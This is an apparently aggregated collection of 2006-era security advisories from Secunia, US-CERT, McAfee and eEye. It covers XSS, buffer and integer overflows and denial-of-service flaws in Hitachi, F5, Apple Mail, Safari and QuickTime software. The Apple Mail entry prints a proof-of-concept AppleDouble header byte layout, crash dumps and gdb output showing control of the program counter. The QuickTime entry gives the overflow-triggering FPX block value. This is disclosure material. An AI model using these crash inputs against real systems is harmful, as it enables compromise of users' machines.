----------------------------------------------------------------------

Unspecified vulnerability in Hitachi XFIT/S, XFIT/S/JCA, XFIT/S/ZGN, and XFIT/S ZENGIN TCP/IP Procedure allows remote attackers to cause a denial of service (server process and transfer control process stop) when the products "receive data unexpectedly". There are unknown vulnerabilities in Hitachi XFIT / S, XFIT / S / JCA, XFIT / S / ZGN, and XFIT / S ZENGIN TCP / IP. (The server process and the transmission control process stop). XFIT/S is prone to a denial-of-service vulnerability. The vulnerability presents itself when the application receives data unexpectedly. Due to a lack of details, further information cannot be provided at the moment. This BID will be updated when more details become available

Cross-site scripting (XSS) vulnerability in Groupmax World Wide Web, World Wide Web Desktop, World Wide Web for Scheduler, and Desktop for Scheduler, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks

Cross-site scripting (XSS) vulnerability in search.php in PHP Classifieds 6.18, 6.20, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the searchword parameter. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Input passed to the "searchword" parameter in "search.php" isn't properly sanitised before being returned to the user. SOLUTION: Edit the source code to ensure that input is properly sanitised. PROVIDED AND/OR DISCOVERED BY: Preddy, RootShell Security Group ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Cross-site scripting (XSS) vulnerability in my.support.php3 in F5 Firepass 4100 SSL VPN 5.4.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. Input passed to the "s" parameter in "my.support.php3" isn't properly sanitised before being returned to the user. Other versions may also be affected. SOLUTION: Do not follow links from untrusted sources or visit untrusted web sites while being logged in to the VPN. PROVIDED AND/OR DISCOVERED BY: ILION Research Labs ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

CoreTypes in Apple Mac OS X 10.4 up to 10.4.5 allows remote attackers to bypass the same-origin policy and execute Javascript in other domains via unknown vectors involving "crafted archives.". Apple Mail contains a buffer overflow that may allow a remote attacker to execute arbitrary code on a vulnerable system. Apple Safari is susceptible to a same-origin policy violation. This issue is due to the application's failure to properly enforce same-origin policy for JavaScript remote data access. An attacker may create a malicious webpage that can access the properties of another domain. This may lead to disclosure of sensitive information or may facilitate other attacks against a user of the browser. Safari is a WEB browser bundled with Apple's family of operating systems. But under certain circumstances, a maliciously crafted document can bypass these restrictions and execute arbitrary code in the user's browser

Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer. This issue is present in Apple Mail when 'Security Update 2006-001' is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not "safe". Prior to 2006-001 certain techniques could be used to disguise a file's type so that the validation was bypassed. Unfortunately in the process of patching the previous problem a new one was introduced. After applying Security Update 2006-001 Mail.app becomes vulnerable to a buffer overflow that may be triggered via a properly formatted MIME Encapsuled Macintosh file. Sending a file in the AppleDouble format with a long Real Name entry will invoke the overflow. Reading through RFC1740 should provide enough information to trigger the issue. The overflow is triggered by the file that contains the AppleDouble header information. The format of the header we need to send is as follows: [4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...] Entry descriptor for each Entry: [4 byte entry id][4 byte offset][4 byte length] Using the above layout we come up with the following code snippet for our exploit. "\x00\x05\x16\x07". # AppleDouble Magic Number "\x00\x02\x00\x00". # Version 2 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler "\x00\x03\x00\x00". # Number of entries (3) "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info' "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10 "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name' "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48 "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245 "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork' "\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d "\x05\x3a\x00\x00". # Length of Resource fork is 0x053a "\x00\x00\x00\x00". # <null> filler "\x00\x00\x00\x00". # <null> filler "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above. If a message with the above header arrived in your inbox on Mail.app you would see only the first 11 characters of the name provided by the Real Name entry. In this particular case you see "AAAAAAAAAAA...mov" . Other examples could be "SuperTastey...mov" or NakedChicks...mov" . The visual aspects of the (...) are surprisingly not that suspicious. Upon double clicking the attached file on the arrived email the following dump is created. Date/Time: 2006-03-04 10:35:32.472 -0500 OS Version: 10.4.5 (Build 8H14) Report Version: 4 Command: Mail Path: /Applications/Mail.app/Contents/MacOS/Mail Parent: WindowServer [64] Version: 2.0.7 (746.2) Build Version: 1 Project Name: MailViewer Source Version: 7460200 PID: 271 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140 If we take a look at this in gdb we can see that several things are overwirtten. (gdb) bt #0 0x41424344 in ?? () Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313131 Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 #1 0x41424344 in ?? () Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313131 warning: Previous frame identical to this frame (corrupt stack?) Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313139 We control r0, pc, lr and half of r31. (gdb) i r $r0 $pc $lr $r31 r0 0x41424344 1094861636 pc 0x41424344 1094861636 lr 0x41424344 1094861636 r31 0x18b3030 25899056 Exploitation of this issue seems possible however there are currently some limitations with regard to what can and can not be done. The first issue involves previous exploitation attempts and the temporary files left behind by such attempts. k-fs-ibook:~ test$ ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\ Downloads/ /Users/test/Library/Mail Downloads/: total 352 drwx------ 7 test admin 238 Mar 13 22:42 . drwx------ 23 test admin 782 Mar 12 15:52 .. drwx------ 3 test admin 102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000 11112222ABCD3333zzz.mov.mailhold /var/tmp/folders.502/TemporaryItems/: total 352 drwxr-xr-x 4 test wheel 136 Mar 13 22:38 . drwx------ 3 test wheel 102 Mar 12 10:35 .. -rwxr-xr-x 1 test wheel 90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001 1112222ABCD3333zzz.mov.mov The existance of a particular temporary file can halt the actions of an exploit attempting to take advantage of this issue. While developing an exploit keeping the two folders shown above clean is critical! The temporary files appear to be created during the process of previewing a message. In some cases they may not be created due to failed mkstemp() calls. The next issue centers around the fact that RFC1740 states that the Real Name entry can only contain 7bit printable ascii, using shellcode addresses with 0xff and 0xbf will not be possible because of this. This obviously eliminates alot of easy shellcode addresses unfortunately. 0xbfffe6e1: "Users/test/Library/Mail Downloads/", 'a' <repeats 166 times>... 0xbfffe7a9: 'a' <repeats 52 times>, "00\032\xff\xf8" Code in other areas seems to be either in an unreliable location or in a unicode format. I am really not in the mood to hunt around memory for a stable address but I am sure that something could be put together to exploit this. Here is an example of the Unicode strings that can be found in memory at random places. (gdb) x/30a $r29 0x18b8a00: 0xa28e6424 0x12100000 0x2f0055 0x730065 0x18b8a10: 0x720073 0x2f0074 0x650073 0x74002f 0x18b8a20: 0x4c0069 0x620072 0x610072 0x79002f 0x18b8a30: 0x4d0061 0x69006c 0x200044 0x6f0077 0x18b8a40: 0x6e006c 0x6f0061 0x640073 0x2f0061 0x18b8a50: 0x610061 0x610061 0x610061 0x610061 0x18b8a60: 0x610061 0x610061 0x610061 0x610061 0x18b8a70: 0x610061 0x610061 On x86 the Unicode *may* not be a problem however I do not have access to an intel based mac so I can not confirm this. On PowerPC however for the time being there is not much I can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the moment. For the time being my exploitation has not gone beyond what I have documented here. Beyond the few hurdles I have outlined may lie a few more, but who knows? Good luck. Work Around: Install 2006-002 update or simply do not open attachments in Mail.app http://www.apple.com/support/downloads/ Sidenote: Much thanks to Apple for the quick turnaround time and prompt weekend responses! A same day response and 9 day turn around is hard to beat

Integer overflow in Apple QuickTime Player 7.0.3 and 7.0.4 and iTunes 6.0.1 and 6.0.2 allows remote attackers to execute arbitrary code via a FlashPix (FPX) image that contains a field that specifies a large number of blocks. Apple QuickTime fails to properly handle FlashPix images. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service condition. Two vulnerabilities have been reported in Apple QuickTime and iTunes: - an integer overflow - a heap-based buffer overflow These issues affect both Mac OS X and Microsoft Windows releases of the software. A successful exploit will result in the execution of arbitrary code in the context of the currently logged-in user. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. An attacker could exploit these vulnerabilities by convincing a user to access a specially crafted image or media file with a vulnerable version of QuickTime. Since QuickTime configures most web browsers to handle QuickTime media files, an attacker could exploit these vulnerabilities using a web page. For more information, please refer to the Vulnerability Notes. II. For further information, please see the Vulnerability Notes. III. Disable QuickTime in your web browser An attacker may be able to exploit this vulnerability by persuading a user to access a specially crafted file with a web browser. Disabling QuickTime in your web browser will defend against this attack vector. For more information, refer to the Securing Your Web Browser document. Appendix A. Please send email to <cert@cert.org> with "TA06-132B Feedback VU#289705" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History May 12, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRGT7JH0pj593lg50AQI2Uwf/U3zGDrR8UkWK4ry6AYMS7HPMdbiF6Vmo 9gP9Luc6Kj8zzxCWhnNKNzEq2P0B1oD03WcPFaIPnwvQJGApeUDRimyhQj8RDjME yAUt/reWG7RZ0Z2w/qaiZP7pQ7SjyIUKkN2OCG8LMmGKqsiCdFXoss/Bu0yFMH11 uvgwibfvkOdRLAPmRTVWk+gJEAdw3xFySm9r92qmig6CxKi7GAIpi9Gf7MXcRsKg oG3y5f06Kiq8ACYszPKneHE7WNvLP1ewuaWmf7PHiNebAB+W5hfwA2yEh6e6PSV2 eBi5cpigfXBrsjXk4L7wYrD8UcRl7nN8iqzWpMwYJkSloUmcYL1BBg== =LsFu -----END PGP SIGNATURE----- . ____________________________________________________________________ McAfee, Inc. McAfee Avert\x99 Labs Security Advisory Public Release Date: 2006-05-11 Apple QuickDraw/QuickTime Multiple Vulnerabilities CVE-2006-1249, CVE-2006-1453, CVE-2006-1454, CVE-2006-1459, CVE-2006-1460, CVE-2006-1461, CVE-2006-1462, CVE-2006-1464, CVE-2006-1465 ______________________________________________________________________ * Synopsis Apple QuickTime and Apple QuickDraw are multimedia technologies used to process image, audio and video data. Two code execution vulnerabilities are present in QuickDraw PICT image format support. Twenty one code execution vulnerabilities are present in QuickTime support for various multimedia formats including: MOV, H.264, MPEG 4, AVI, FPX and SWF. In order for an attack to succeed user interaction is required and therefore the risk factor for these issues is medium. CVE-2006-1459 Seven integer overflow vulnerabilities are present in QuickTime MOV video format support. CVE-2006-1460 Five buffer overflow vulnerabilities are present in QuickTime MOV video format support. CVE-2006-1461 Two buffer overflow vulnerabilities are present in QuickTime Flash (SWF) support. CVE-2006-1462 Three integer overflow vulnerabilities are presenting QuickTime H.264 (M4V) video format support. CVE-2006-1464 One buffer overflow vulnerability is present in QuickTime MPEG4 (M4P) video format support. CVE-2006-1465 One buffer overflow vulnerability is present in QuickTime AVI video format support. ______________________________________________________________________ * Legal Notice Copyright (C) 2006 McAfee, Inc. The information contained within this advisory is provided for the convenience of McAfee\x92s customers, and may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. McAfee makes no representations or warranties regarding the accuracy of the information referenced in this document, or the suitability of that information for your purposes. McAfee, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners. ______________________________________________________________________ . Technical Description: In an fpx file, there is a field that figures out how many blocks of data there are in that file. One block data size is 0x200, QuickTime Player will allocate memory relying on (number*0x200) but does not check the size value and an integer overflow can occur. If you set the block value to 0x800000 an integer overflow will occur which will then cause a heap overflow and write invalid memory. QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Blink - Endpoint Vulnerability Prevention - preemptively protects from this vulnerability. Vendor Status: Apple has released a patch for this vulnerability information is available at http://docs.info.apple.com/article.html?artnum=61798 Credit: Discovery: Fang Xing Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. TITLE: QuickTime Multiple Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA20069 VERIFY ADVISORY: http://secunia.com/advisories/20069/ CRITICAL: Highly critical IMPACT: DoS, System access WHERE: >From remote SOFTWARE: Apple Quicktime 4.x http://secunia.com/product/7923/ Apple Quicktime 5.x http://secunia.com/product/215/ Apple Quicktime 6.x http://secunia.com/product/810/ Apple QuickTime 7.x http://secunia.com/product/5090/ DESCRIPTION: Multiple vulnerabilities have been reported in QuickTime, which can be exploited by malicious people to compromise a user's system. 3) A boundary error within the processing of Flash movies can be exploited via a specially crafted Flash movie to crash the application and potentially execute arbitrary code. 4) An integer overflow and boundary error within the processing of H.264 movies can be exploited via a specially crafted H.264 movie to crash the application and potentially execute arbitrary code. 5) A boundary error within the processing of MPEG4 movies can be exploited via a specially crafted MPEG4 movie to crash the application and potentially execute arbitrary code. 7) A boundary error within the processing of AVI movies can be exploited via a specially crafted AVI movie to crash the application and potentially execute arbitrary code. 8) Two boundary errors within the processing of PICT images can be exploited to either cause a stack-based via a PICT image with specially crafted font information or a heap-based buffer overflow via a PICT image with specially crafted image data. This can be exploited to crash the application and potentially execute arbitrary code. 9) A boundary error within the processing of BMP images can be exploited via a specially crafted BMP image to crash the application and potentially execute arbitrary code. SOLUTION: Update to version 7.1. http://www.apple.com/support/downloads/quicktime71.html PROVIDED AND/OR DISCOVERED BY: 1) Reported by the vendor. 2) Mike Price of McAfee AVERT Labs and Sowhat of Nevis Labs. 3) Mike Price, McAfee AVERT Labs. 4) Mike Price of McAfee AVERT Labs and ATmaCA. 5) Mike Price, McAfee AVERT Labs. 6) Fang Xing of eEye Digital Security and Mike Price of McAfee AVERT Labs. 7) Mike Price, McAfee AVERT Labs. 8) Mike Price, McAfee AVERT Labs. 9) Tom Ferris ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=303752 eEye Digital Security: http://www.eeye.com/html/research/advisories/AD20060511.html Zero Day Initiative: http://www.zerodayinitiative.com/advisories/ZDI-06-015.html Sowhat: http://secway.org/advisory/AD20060512.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------